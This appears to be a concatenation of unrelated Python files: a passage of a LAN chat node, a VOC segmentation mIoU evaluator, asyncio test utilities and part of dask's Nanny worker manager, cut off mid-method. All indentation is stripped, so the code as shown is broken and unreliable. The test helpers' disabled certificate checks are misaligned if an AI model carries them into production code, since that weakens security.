c, m = utils.recv(self.__s)
inst = [(c, m, self.__s)]
else:
inst = []
with self.__client_list_lock:
for com in self.clients:
c, m = utils.recv(com)
if c is not None:
inst.append((c, m, com))
return inst
def __process_instructions(self, inst):
"Act on instructions recieved"
to_send = []
for cmd, msg, com in inst:
if cmd not in config.CMDS: # ignore if it is not legal
continue
if cmd == 'MSG':
if self.mode == 's':
to_send.append((msg, com))
if self.color:
txt = config.Col.BOLD + msg + config.Col.ENDC
else:
txt = msg
print(txt)
if self.issue_alert:
os.system(self.alert)
elif cmd == 'QUIT':
if self.mode == 's': # client quit
com.close()
with self.__client_list_lock:
self.clients.remove(com)
else: # server quit
self.__s.close()
self.__make_client() # wait for new server
elif cmd == 'ASSUME':
if self.mode == 'c': # assume a server role if client
self.__s.close()
self.__make_server()
for msg, sender in to_send:
if self.mode == 'c':
utils.msg(msg, self.__s)
else:
with self.__client_list_lock:
for com in self.clients:
if com == sender:
continue
utils.msg(msg, com)
def __beacon_thread(self):
b = utils.get_beacon()
while self.alive:
msg = config.broadcast_msg.encode(config.ENCODING)
b.sendto(msg, config.broadcast_addr)
time.sleep(config.beacon_delay)
b.close()
def __output_thread(self):
"Output thread"
while self.alive:
instructions = self.__get_instructions()
self.__process_instructions(instructions)
def __input_thread(self):
"Input thread"
last_input = time.time()
while self.alive:
x = input(config.prompt)
self.issue_alert = (time.time() - last_input) > 10
last_input = time.time()
msg = self.name + ': ' + x
if self.mode == 'c': # client
utils.msg(msg, self.__s)
else: # server
with self.__client_list_lock:
for com in self.clients:
utils.msg(msg, com)
def __make_server(self):
"Make this node a server"
notice('Making server, getting listening socket', self.color)
self.mode = 's'
sock = utils.get_server_sock()
self.__s = sock
with self.__client_list_lock:
self.clients = deque()
self.threads = deque()
notice('Making beacon', self.color)
b = Thread(target=self.__beacon_thread, name='beacon')
b.start()
self.threads.append(b)
l = Thread(target=self.__listen_thread, name='listen')
notice('Starting listen thread', self.color)
l.start()
self.threads.append(l)
def __make_client(self):
"Make this node a client"
notice('Making client, getting server connection', self.color)
self.mode = 'c'
addr = utils.get_existing_server_addr()
sock = utils.get_client_sock(addr)
self.__s = sock
with self.__client_list_lock:
self.clients = deque()
self.threads = deque()
|
evaluation_cam.py
|
import os
import pandas as pd
import numpy as np
from PIL import Image
import multiprocessing
import argparse
categories = ['background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
def do_python_eval(predict_folder, gt_folder, name_list, num_cls=21, input_type='png', threshold=1.0, printlog=False):
TP = []
P = []
T = []
for i in range(num_cls):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
def compare(start, step, TP, P, T, input_type, threshold):
for idx in range(start, len(name_list), step):
name = name_list[idx]
if input_type == 'png':
predict_file = os.path.join(predict_folder, '%s.png' % name)
predict = np.array(Image.open(predict_file)) # cv2.imread(predict_file)
elif input_type == 'npy':
predict_file = os.path.join(predict_folder, '%s.npy' % name)
predict_dict = np.load(predict_file, allow_pickle=True).item()
h, w = list(predict_dict.values())[0].shape
tensor = np.zeros((21, h, w), np.float32)
for key in predict_dict.keys():
tensor[key + 1] = predict_dict[key]
tensor[0, :, :] = threshold
predict = np.argmax(tensor, axis=0).astype(np.uint8)
gt_file = os.path.join(gt_folder, '%s.png' % name)
gt = np.array(Image.open(gt_file))
cal = gt < 255
mask = (predict == gt) * cal
for i in range(num_cls):
P[i].acquire()
P[i].value += np.sum((predict == i) * cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt == i) * cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt == i) * mask)
TP[i].release()
p_list = []
for i in range(8):
p = multiprocessing.Process(target=compare, args=(i, 8, TP, P, T, input_type, threshold))
p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
T_TP = []
P_TP = []
FP_ALL = []
FN_ALL = []
for i in range(num_cls):
IoU.append(TP[i].value / (T[i].value + P[i].value - TP[i].value + 1e-10))
T_TP.append(T[i].value / (TP[i].value + 1e-10))
P_TP.append(P[i].value / (TP[i].value + 1e-10))
FP_ALL.append((P[i].value - TP[i].value) / (T[i].value + P[i].value - TP[i].value + 1e-10))
FN_ALL.append((T[i].value - TP[i].value) / (T[i].value + P[i].value - TP[i].value + 1e-10))
loglist = {}
for i in range(num_cls):
loglist[categories[i]] = IoU[i] * 100
miou = np.mean(np.array(IoU))
loglist['mIoU'] = miou * 100
if printlog:
for i in range(num_cls):
if i % 2 != 1:
print('%11s:%7.3f%%' % (categories[i], IoU[i] * 100), end='\t')
else:
print('%11s:%7.3f%%' % (categories[i], IoU[i] * 100))
print('\n======================================================')
print('%11s:%7.3f%%' % ('mIoU', miou * 100))
return loglist
def writedict(file, dictionary):
s = ''
for key in dictionary.keys():
sub = '%s:%s ' % (key, dictionary[key])
s += sub
s += '\n'
file.write(s)
def writelog(filepath, metric, comment):
logfile = open(filepath, 'a')
import time
logfile.write(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logfile.write('\t%s\n' % comment)
writedict(logfile, metric)
logfile.write('=====================================\n')
logfile.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# The root path for train.txt VOC12 '.../VOCdevkit/VOC2012/ImageSets/Segmentation/train.txt'
parser.add_argument("--list", required=True, type=str)
parser.add_argument("--predict_dir", default='out_cam', type=str)
# The root path for groundtruth VOC12 '.../VOCdevkit/VOC2012/SegmentationClass'
parser.add_argument("--gt_dir", required=True, default='',type=str)
parser.add_argument('--logfile', default='./eval.txt', type=str)
parser.add_argument('--comment', default='', type=str)
parser.add_argument('--type', default='npy', choices=['npy', 'png'], type=str)
parser.add_argument('--t', default=None, type=float)
parser.add_argument('--curve', default=True, type=bool)
args = parser.parse_args()
if args.type == 'npy':
assert args.t is not None or args.curve
df = pd.read_csv(args.list, names=['filename'])
name_list = df['filename'].values
if not args.curve:
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, args.t, printlog=True)
writelog(args.logfile, loglist, args.comment)
else:
l = []
for i in range(20,60):
t = i / 100.0
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, t, printlog=False)
l.append(loglist['mIoU'])
print('%d/60 background score: %.3f\tmIoU: %.3f%%' % (i, t, loglist['mIoU']))
writelog(args.logfile, {'mIoU': l}, args.comment)
|
utils.py
|
"""Utilities shared by tests."""
import sys
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import tempfile
import threading
import time
import unittest
import weakref
import pytest
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
from asyncio.format_helpers import _get_function_source
except ImportError: # <3.7
from asyncio.events import _get_function_source
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, 'python', filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), 'python', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer':
(
(('countryName', 'XY'),), (('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)
),
'notAfter':
'Nov 28 19:09:06 2027 GMT',
'notBefore':
'Jan 19 19:09:06 2018 GMT',
'serialNumber':
'82EDBF41C880919C',
'subject':
(
(('countryName', 'XY'),), (('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),), (('commonName', 'localhost'),)
),
'subjectAltName': (('DNS', 'localhost'),),
'version':
3
}
def simple_server_sslcontext():
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
return server_context
def simple_client_sslcontext():
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
return client_context
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
async def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__), 'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(
address=path,
use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer
)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(
address=(host, port),
use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer
)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages its own clock directly.
If something is scheduled to run later, the generator passed to
__init__ is advanced on the next loop iteration, after all ready
handlers have been executed.
The generator should look like this:
def gen():
...
when = yield ...
... = yield time_advance
The value received from a yield expression is the absolute time of the
next scheduled handler; the value the generator yields back is the time
advance used to move the loop's clock forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
if sys.version_info >= (3, 7):
self.readers[fd] = events.Handle(callback, args, self, context=None)
else:
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError('fd %s is not registered' % fd)
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError('unexpected callback: %s != %s' % (handle._callback, callback))
if handle._args != args:
raise AssertionError('unexpected callback args: %s != %s' % (handle._args, args))
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError('fd %s is registered' % fd)
def _add_writer(self, fd, callback, *args):
if sys.version_info >= (3, 7):
self.writers[fd] = events.Handle(callback, args, self, context=None)
else:
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: " "{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(fd, transport)
)
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args, context=None):
self._timers.append(when)
if sys.version_info >= (3, 7):
return super().call_at(when, callback, *args, context=context)
else:
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
class MockInstanceOf:
def __init__(self, type):
self._type = type
def __eq__(self, other):
return isinstance(other, self._type)
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def setUp(self):
# self._get_running_loop = events._get_running_loop
# events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
# events._get_running_loop = self._get_running_loop
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL + 1)
yield
finally:
logger.setLevel(old_level)
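# Usage sketch (assumption, for illustration only; the coroutine name is made up):
# silence asyncio's logger around a test step that intentionally triggers warnings.
#
#     with disable_logger():
#         loop.run_until_complete(coro_that_logs_warnings())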
def mock_nonblocking_socket(
proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM, family=socket.AF_INET
):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
if sys.version_info < (3, 7):
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available', return_value=False)
def get_function_source(func):
source = _get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
def deprecate(tc, vers=None):
if vers is None or sys.version_info >= vers:
return pytest.deprecated_call()
class _deprecate:
def __init__(self, tc):
pass
def __enter__(self):
return self
def __exit__(self, *tb):
pass
return _deprecate(tc)
|
nanny.py
|
import asyncio
from contextlib import suppress
import errno
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address, Status
from .metrics import time
from .node import ServerNode
from . import preloading
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
parse_timedelta,
parse_ports,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches them, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
local_directory = os.path.join(local_directory, "dask-worker-space")
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the RPC side because of a naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
            raise ValueError(
                f"Could not start Nanny on host {self._start_host} "
                f"with port {self._start_port}"
            )
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
        if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != Status.running:
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (Status.closing, Status.closed):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
        warnings.warn("Nanny._close has moved to Nanny.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
